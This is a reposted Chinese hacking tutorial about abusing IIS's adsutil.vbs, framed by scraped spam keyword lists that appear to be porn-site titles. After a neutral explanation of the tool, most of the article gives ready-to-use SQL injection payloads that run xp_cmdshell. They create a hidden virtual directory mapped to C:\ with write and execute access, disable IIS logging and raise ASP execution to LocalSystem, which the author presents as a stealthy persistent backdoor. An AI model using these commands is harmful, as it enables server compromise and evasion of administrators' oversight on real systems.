婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]

Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]

熱門標簽:百度地圖標注是什么意思 外呼系統(tǒng)telrobot 合肥高德地圖標注 拉薩外呼系統(tǒng)業(yè)務(wù) 外呼系統(tǒng)免費招代理 深圳外呼系統(tǒng)收費 怎么看地圖標注 廣州ai電銷機器人一般多少錢 外呼線路中繼線是什么
一、簡單介紹 
adsutil.vbs是什么?相信用過IIS的網(wǎng)管員不會不知道。這是IIS自帶的提供于命令行下管理IIS的一個腳本。位于%SystemDrive%\Inetpub\AdminScripts目錄下。足足有95,426 字節(jié)大小。這么大的腳本一看就知道功能強大。事實也的確如此?;旧衔业母杏X它就是個命令行下的“Internet 信息服務(wù)管理器”。(事實上2000的服務(wù)器上%SystemDrive%\Inetpub\AdminScripts下原有20多個vbs文件以供管理。而到了2003則只剩下adsutil.vbs一個了。足以說明它的功能是多么復(fù)雜) 
提到adsutil.vbs就不得不提到MetaBase.bin。這個文件是IIS最重要的配置文件。所有對IIS的設(shè)置最終都會儲存在這個文件中。IIS管理器和adsutil.vbs就是通過對這個文件讀取配置信息來顯示給用戶的。MetaBase.bin的儲存結(jié)構(gòu)十分像注冊表,是一種樹型儲存結(jié)構(gòu)。IIS管理器和adsutil.vbs通過一個Adspath的路徑來訪問MetaBase.bin。路徑是由IIS:\開頭,其中LocalHost表示本地服務(wù)器,而w3svc表示IIS服務(wù)。如IIS:\LocalHost/w3svc/1表示本地服務(wù)器上的第一個web站點。IIS:\LocalHost/w3svc/1/root/Vdir表示第一個web站點根目錄下的Vdir虛擬目錄。 
有了這些前置知識,下面再回到adsutil.vbs來看看它的用法吧: 

C:\Inetpub\AdminScripts>cscript adsutil.vbs    //別忘了鍵入cscript.exe這個腳本宿主文件名哦 
Microsoft (R) Windows Script Host Version 5.6 
版權(quán)所有(C) Microsoft Corporation 1996-2001。保留所有權(quán)利。 


Usage: 
      ADSUTIL.VBS cmd> [path> [value>]] 

Description: 
IIS administration utility that enables the configuration of metabase properties 


Supported Commands:    //支持的命令。這個最重要 
  GET, SET, ENUM, DELETE, CREATE, COPY, 
  APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP 
PGETSTATUS 

Samples:    //簡單的幾個例子 
  adsutil.vbs GET W3SVC/1/ServerBindings   //查看第一個虛擬web站點的邦定端口。這里的W3SVC/1是IIS:\&;LocalHostW3SVC/1的簡寫,而ServerBindings是他的屬性。下同。 
  adsutil.vbs SET W3SVC/1/ServerBindings ":81:"  //設(shè)定第一個虛擬web站點的邦定端口為81。 
  adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir"  //在第一個虛擬web站點根目錄下建立一個MyVdir的虛擬目錄。后面的"IIsWebVirtualDir"指的是目錄類型。 
  adsutil.vbs START_SERVER W3SVC/1  //啟動第一個虛擬web站點。 
  adsutil.vbs ENUM /P W3SVC   //查看IIS的所有站點。 

For Extended Help type: 
  adsutil.vbs HELP  //如果想要進一步的查看幫助,鍵入此命令。我這里就不轉(zhuǎn)了。防止有人說我賺稿費。大家可以自己看看。 

以上“//”后的文字都是我添加上去的注釋(下同)。相信這樣應(yīng)該可以看懂了吧大家。 
我們所常用的adsutil.vbs的命令有這么幾個:GET, SET, ENUM, DELETE, CREATE?,F(xiàn)在我來一一說明: 
GET命令通常是用來查看目錄的各項屬性值的。SET是用來設(shè)定目錄屬性用的。ENUM也是用來查看屬性。所不同的是他直接把所有設(shè)置了的屬性直接全部顯示出來。通常一個目錄就有好幾頁東西可看……他有個可選的“/p”開關(guān)符。加上了此開關(guān)的話。他只會列出此目錄下的所有虛擬目錄。DELETE命令是用來刪除虛擬目錄的。CREATE則是創(chuàng)建一個虛擬目錄。另外還有幾個命令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分別是啟動、停止、暫停、繼續(xù)虛擬站點的運行。 
一個虛擬目錄的大致屬性值如下(我只列出了可能我們所常用的,否則會太長了): 

KeyType                         : (STRING) "IIsWebVirtualDir"  //目錄類型,(STRING)說明它是個字符串類型的屬性 
AppRoot                         : (STRING) "/LM/W3SVC/1/ROOT"  //目錄IIS路徑 
AppFriendlyName                 : (STRING) "默認應(yīng)用程序"  //應(yīng)用程序名 
AppIsolated                     : (INTEGER) 2  //指定運行于進程外還是進程中,數(shù)字類型屬性。 
HttpCustomHeaders               : (LIST) (1 Items)   //自定義IIS數(shù)據(jù)頭 
  "Powered By : www.WoFeiWo.Info" 

HttpErrors                      : (LIST) (42 Items)  //各種IIS代碼所返回的頁面??梢宰孕性O(shè)置。我這里將會顯省略了。 
DefaultDoc                      : (STRING) "Default.htm,index.htm,Default.asp,in 
dex.asp,Default.php,index.php,Default.aspx,index.aspx"   //目錄的默認主頁面名稱。 
Path                            : (STRING) "D:\ftp"  //目錄所真正映射的物理路徑 
AccessFlags                     : (INTEGER) 513  //我也不知道這是啥。反正沒設(shè)置過。好像會自動設(shè)置的 
AccessExecute                   : (BOOLEAN) False   //目錄的執(zhí)行權(quán)限,是布爾值 
AccessSource                    : (BOOLEAN) False   //目錄的Webdav訪問是否允許 
AccessRead                      : (BOOLEAN) True   //目錄的只讀權(quán)限 
AccessWrite                     : (BOOLEAN) False   //目錄的寫權(quán)限 
AccessScript                    : (BOOLEAN) True    //目錄是否允許執(zhí)行腳本 
AccessNoRemoteExecute           : (BOOLEAN) False 
AccessNoRemoteRead              : (BOOLEAN) False 
AccessNoRemoteWrite             : (BOOLEAN) False 
AccessNoRemoteScript            : (BOOLEAN) False 
AccessNoPhysicalDir             : (BOOLEAN) False 
ScriptMaps                      : (LIST) (27 Items)   //應(yīng)用程序擴展名映射 
  ".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" 
  ".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" 
  ".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA 
D,POST,DEBUG" 
  ………………  //這里省略了n多數(shù)據(jù) 
AspEnableParentPaths            : (BOOLEAN) True 
AppPoolId                       : (STRING) "DefaultAppPool"  //應(yīng)用程序池名稱 
DontLog                         : (BOOLEAN) True   //禁止IISLog紀錄 
DirBrowseFlags                  : (INTEGER) -1073741762 
EnableDirBrowsing               : (BOOLEAN) True  //目錄是否允許列目錄 
DirBrowseShowDate               : (BOOLEAN) True  //這里及以下都是顯示目錄時的參數(shù)設(shè)置。英文都很簡單。我也就不多說了。 
DirBrowseShowTime               : (BOOLEAN) True 
DirBrowseShowSize               : (BOOLEAN) True 
DirBrowseShowExtension          : (BOOLEAN) True 
DirBrowseShowLongDate           : (BOOLEAN) True 
EnableDefaultDoc                : (BOOLEAN) True  //是否開啟默認主頁文檔 

以上是我用cscript adsutil.vbs ENUM w3svc/1/root命令在自己機器上察看到的。大家也可以自己輸入以上命令研究。 
上面的屬性我們都可以來通過SET命令來進行設(shè)置。如下方式: 
cscript adsutil.vbs SET w3svc/1/root/目錄名/屬性名 設(shè)置值 
如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1  //設(shè)置第一個虛擬web站點下的wofeiwo虛擬目錄的可讀權(quán)限為Ture 
或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”  //設(shè)置目錄的映射路徑是“C:\” 
下面來看看我們的簡單利用的例子 
二、adsutil.vbs的利用 
(一)MSSQL Injection的上傳新思路 
或許大家會在MSSQL的注入中碰到這種情況:SA權(quán)限??梢詧?zhí)行Cmd命令(xp_cmdshell、sp_OACreate、Job等等)。可是服務(wù)器是在內(nèi)網(wǎng)。外面是個堡壘主機。只是做了個80端口的映射。3389開了沒有用(內(nèi)網(wǎng)連不上啊),所有反向木馬也傳不上去(Tftp、Ftp、Wget、exe2bat等等)這時候你該怎么辦? 
Amanl大哥經(jīng)典的《榨干MSSQL最后一滴血》給我們一個很好的思路:就是利用%SystemDrive%\Inetpub\AdminScripts下的vbs建立一個新的虛擬目錄。自定義其映射的絕對路徑。這樣可以繞過了對web絕對路徑的猜解。然后通過BACKUP或MASKWEBTASK備份數(shù)據(jù)庫或臨時表到虛擬目錄下(或是直接echo)就可以得到了一個shell。 
上面的想法的確很好??墒怯眠^臭要飯的GetWebShell或小竹的NBUpFile的人都知道BACKUP或MASKWEBTASK的成功率有多么的低……而echo……我也不想說了。一行一行寫那簡直是找罪受。(還要不停的轉(zhuǎn)特殊字符……) 
其實我們可以把Amanl大哥的想法改進一下。在我們建立一個新的虛擬目錄的時候??梢约由蠈懩夸浀臋?quán)限。再加上Webdav……那么我們不久可以直接通過IIS上傳任何文件了嗎?也不僅僅局限于文本文件了。如果我們上傳了個反向后門在通過SA執(zhí)行……呵呵,一切就都搞定了! 
來,馬上實行: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';-- 
注意上面的特殊字符要自己轉(zhuǎn)變?;蛘吣憧梢杂肗BSI2或者小路的SQLCOMM來執(zhí)行以上命令。 
這樣我們就在第一個web站點下建立了一個wofeiwo的虛擬目錄,映射到了C:根目錄。我再給他加上讀和寫的權(quán)限,為了要一個webshell ,我再加上執(zhí)行腳本的權(quán)限: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';-- 
寫到這看過Surperhei《對IIS寫權(quán)限的利用》的朋友可能會想要自己構(gòu)造http包來上傳文件。其實有更簡單的方法: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';-- 
設(shè)置為允許列目錄和webdav訪問,然后打開你的IE,Ctrl+O打開“打開”對話框,鍵入你剛才設(shè)置的虛擬目錄。選中“以Web文件夾方式打開”,確定。如圖: 
圖一 


啊哈!看到所有的文件夾了嗎?如圖所示: 

圖二 


現(xiàn)在你就可以像操作普通文件夾一樣操作以上文件了。還可以Ctrl+C、Ctrl+V復(fù)制文件呢。實現(xiàn)了方便上傳、修改文件的功能。 
(二)更進一步 
其實我們完全可以更進一步利用上面所說的思路直接制作一個IIS后門。來,看我的實現(xiàn)?。ㄟ@里使用了動鯊在《近乎完美的IIS后門》中所介紹的方法。不過我是直接用adsutil.vbs這個MS自帶的工具完成了設(shè)置。對此文章感興趣的朋友可以自己找來看看。) 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--  //首先建立一個wofeiwo目錄。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';--  //在wofeiwo目錄下又建立了一個door目錄。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';--  //設(shè)置door目錄映射到C:根目錄。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';--  //這里及以下都是給目錄設(shè)置個種權(quán)限??梢詤⒖家陨系拿钭⑨?。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';-- 
可能會有人說,什么阿。不就是和上面的一樣嗎?呵呵。其實你仔細看。會發(fā)現(xiàn)我們上面新建的第一個目錄“wofeiwo”并沒有設(shè)置“Path”屬性。也就是說他沒有映射到任何實際的目錄上去。這里應(yīng)用了IIS的一個漏洞(涉及到IIS5.0.1.0)。即對于沒有“Path”屬性的虛擬目錄是不會在IIS管理器中出現(xiàn)的。相當于一個隱藏的目錄。而其下的虛擬目錄“door”同樣是由于上級目錄不可見的,所以它也是不可見的!但是“door”目錄是設(shè)置了“Path”屬性的。所以如果我們提交http://IP/wofeiwo/door/ 路徑。其結(jié)果是會返回C:下的文件目錄。現(xiàn)在此目錄已經(jīng)是我們可以任意寫文件讀文件了。并且還可以轉(zhuǎn)到System32目錄下對程序進行運行。我們的后門雛形建成了。(注意看我這里是加上了AccessExecute執(zhí)行權(quán)限的) 
但是我們現(xiàn)在執(zhí)行的程序都還是IIS默認的IUSR用戶的Guest權(quán)限。沒有大的權(quán)限我們總是不爽。下面來提升我們的權(quán)限,加IUSR用戶為管理員就不說了。下面說說另兩個方法: 
1、設(shè)置AppIsolated,使此目錄下程序在IIS的進程中進行。這樣就繼承了IIS的System權(quán)限。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';-- 
2、    將解析asp文件的asp.dll加入到IIS的特權(quán)dll中。使得其在進程中運行。從而的到IIS的LocalSystem權(quán)限。 
1)首先得到IIS所有的特權(quán)dll 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs GET w3svc/InProcessIsapiApps';-- 
返回: 
InProcessIsapiApps              : (LIST)  (5 Items) 
  "C:\WINDOWS\system32\inetsrv\httpext.dll" 
  "C:\WINDOWS\system32\inetsrv\httpodbc.dll" 
  "C:\WINDOWS\system32\inetsrv\ssinc.dll" 
  "C:\WINDOWS\system32\msw3prt.dll" 
  "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" 
2)    將asp.dll設(shè)置到InProcessIsapiApps組中去,這里要注意,把上面的所有查到的dll都加上,否則會被刪除。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\&;adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';-- 
返回: 
InProcessIsapiApps              : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll" 
這樣就設(shè)置好了。以后無論什么asp文件就都是 LoaclSystem權(quán)限了。通過以上的步驟。我們的IIS后門基本上就是設(shè)置好了。你可以上傳asp木馬加以輔助控制。這樣的設(shè)置型后門是很難被管理員發(fā)現(xiàn)的。并且完全通過IIS的80端口通訊。又沒有日志記錄。所以相當安全。 
三、結(jié)言 
到這里我關(guān)于adsutil.vbs的一點簡單應(yīng)用就結(jié)束了。突然發(fā)現(xiàn)文章已經(jīng)寫了那么多了。哇啊啊……文章寫得好累阿。由于本人是一菜鳥。文章難免有疏漏。還請大家多多指教。有什么疑問請和我聯(lián)系。我的郵箱:wofeiwo@bugkidz.org?;蛘叽蠹铱梢缘交鸷夹g(shù)聯(lián)盟http://www.wrsky.com來找我。我的ID:我非我。是論壇新手版的版主。
您可能感興趣的文章:
  • cscript adsutil.vbs 設(shè)置iis參數(shù)提示拒絕訪問的解決方法
  • IIS管理腳本之a(chǎn)dsutil.vbs的使用說明
  • 使用 Adsutil.vbs iis管理腳本

標簽:漳州 六安 玉林 延安 嘉興 廣安 周口 臺灣

巨人網(wǎng)絡(luò)通訊聲明:本文標題《Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]》,本文關(guān)鍵詞  Adsutil.vbs,在,腳本,攻擊,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]》相關(guān)的同類信息!
  • 本頁收集關(guān)于Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    亚洲乱码国产乱码精品精可以看| 三级精品在线观看| 不卡的av电影| 成人看片黄a免费看在线| 顶级嫩模精品视频在线看| 成人国产在线观看| 欧美日韩中文一区| 911精品国产一区二区在线| 日韩一区二区电影在线| 欧美午夜精品理论片a级按摩| 久久久影院官网| 国产91精品一区二区麻豆网站| 亚洲图片欧美激情| 91精品欧美福利在线观看| 美女一区二区视频| 国产日韩精品视频一区| 91视频观看视频| 奇米影视一区二区三区| 国产精品嫩草久久久久| 欧美日韩国产大片| 国产一区美女在线| 亚洲视频一区二区在线观看| 欧美一卡二卡三卡四卡| 国产成人综合在线| 亚洲成av人片在线观看| 亚洲国产精品激情在线观看 | 日韩欧美在线1卡| 国产精品一区二区久激情瑜伽 | 国产精品77777| 亚洲卡通欧美制服中文| 日韩一卡二卡三卡国产欧美| 成人教育av在线| 毛片不卡一区二区| 亚洲一区二三区| 中文字幕第一页久久| 欧美一区二区在线视频| 91一区二区三区在线播放| 激情亚洲综合在线| 五月天精品一区二区三区| 亚洲欧洲国产日韩| 久久综合国产精品| 欧美日本在线播放| fc2成人免费人成在线观看播放| 喷白浆一区二区| 五月婷婷激情综合| 一区二区三区四区视频精品免费| 精品99999| 日韩视频123| 欧美色视频在线| 91免费版pro下载短视频| av中文字幕在线不卡| 夫妻av一区二区| 国产真实精品久久二三区| 亚洲1区2区3区4区| 一区二区三区免费网站| 中文字幕在线一区二区三区| 国产视频一区不卡| 久久久综合视频| 欧美国产精品一区二区| 国产精品三级在线观看| 久久久精品综合| 欧美激情一区二区| 中文字幕av资源一区| 国产色婷婷亚洲99精品小说| 26uuu精品一区二区三区四区在线| 日韩一级欧美一级| 日韩欧美国产三级电影视频| 日韩欧美国产1| 国产亚洲一区二区三区四区| 国产欧美视频一区二区| 中文av一区二区| 一区二区三区在线观看欧美| 天天色综合天天| 美女mm1313爽爽久久久蜜臀| 亚洲一区二区三区四区在线| 欧美—级在线免费片| 国产精品原创巨作av| 国产乱人伦偷精品视频不卡| 亚洲欧洲国产专区| 亚洲色图丝袜美腿| 一区二区三区欧美亚洲| 日韩av电影免费观看高清完整版在线观看| 亚洲国产成人精品视频| 美女被吸乳得到大胸91| 国产成人在线观看免费网站| 成人午夜电影小说| 在线观看欧美日本| 日韩免费一区二区| 久久久激情视频| 国产成人在线免费观看| 91亚洲精品久久久蜜桃网站| 91.成人天堂一区| 在线看不卡av| 韩日av一区二区| 韩国精品免费视频| 国产精品88888| 不卡欧美aaaaa| 成人久久18免费网站麻豆| 成人综合婷婷国产精品久久 | 国产精品18久久久久久久久久久久| 久久不见久久见免费视频1| 国产激情视频一区二区三区欧美| 国产寡妇亲子伦一区二区| 成人一区在线看| 国产精品区一区二区三| 99热精品一区二区| 国产精品免费人成网站| 亚洲国产精品黑人久久久| 最新不卡av在线| 蜜芽一区二区三区| 国产精品 日产精品 欧美精品| 91在线国内视频| 69成人精品免费视频| 国产精品久久久久久久久久久免费看 | 91免费视频观看| 精品国产精品网麻豆系列| 一区2区3区在线看| 国产一区二区三区在线观看免费视频 | k8久久久一区二区三区| 欧美成人精精品一区二区频| 亚洲欧洲99久久| 国产黄色精品视频| 欧美一区二区三区男人的天堂| 亚洲免费视频中文字幕| 成人黄色大片在线观看| 精品成人在线观看| 午夜av电影一区| 欧美日韩午夜影院| 一区二区三区成人在线视频| 99久久精品国产观看| 中文字幕精品一区二区三区精品| 国产一区视频在线看| 日韩欧美一级在线播放| 三级影片在线观看欧美日韩一区二区| 91无套直看片红桃| 国产精品久久久久久久久果冻传媒| 国产精品99久| 国产丝袜欧美中文另类| 国产精品白丝jk黑袜喷水| 久久综合视频网| 国产乱码精品一区二区三区忘忧草 | 中文字幕一区视频| 国产精品系列在线观看| 国产三级一区二区| 成人三级在线视频| 国产精品毛片高清在线完整版| 国产很黄免费观看久久| 中国色在线观看另类| 99麻豆久久久国产精品免费| 中文字幕一区二区三区精华液| 99视频精品全部免费在线| 亚洲欧洲综合另类在线| 色乱码一区二区三区88| 婷婷久久综合九色综合伊人色| 欧美变态tickling挠脚心| 国产1区2区3区精品美女| 自拍av一区二区三区| 欧美精品在欧美一区二区少妇| 另类小说欧美激情| 日本一区二区电影| 欧美在线视频日韩| 日本午夜精品一区二区三区电影| 精品日产卡一卡二卡麻豆| 国产一区二区三区综合| 国产精品免费丝袜| 欧美亚州韩日在线看免费版国语版| 亚洲成av人片在线观看无码| 欧美高清精品3d| 成人黄色777网| 日本伊人精品一区二区三区观看方式| 久久久久一区二区三区四区| 欧美在线免费观看视频| 国产乱码精品一区二区三 | 国产精品资源网站| 中文字幕一区三区| 欧美一区二区三区免费| 成人午夜av影视| 日本91福利区| 亚洲欧美在线aaa| 精品国产乱码久久久久久免费| a级高清视频欧美日韩| 日产国产高清一区二区三区| 国产精品第一页第二页第三页| 91麻豆精品国产91久久久久久 | 国产又粗又猛又爽又黄91精品| 国产精品高潮久久久久无| 欧美一区二区三区四区五区| 成人app网站| caoporm超碰国产精品| 国产精品麻豆欧美日韩ww| 91丨九色丨蝌蚪富婆spa| 亚洲品质自拍视频| 亚洲午夜久久久| 91亚洲大成网污www| 国产在线精品一区二区不卡了 | 精品一区二区综合| 首页综合国产亚洲丝袜| 亚洲美女视频在线| 国产精品免费av| 国产亚洲综合av|